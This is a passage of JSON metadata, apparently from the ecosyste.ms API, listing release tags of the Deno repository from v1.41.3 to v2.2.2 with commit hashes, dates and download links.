itories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/rep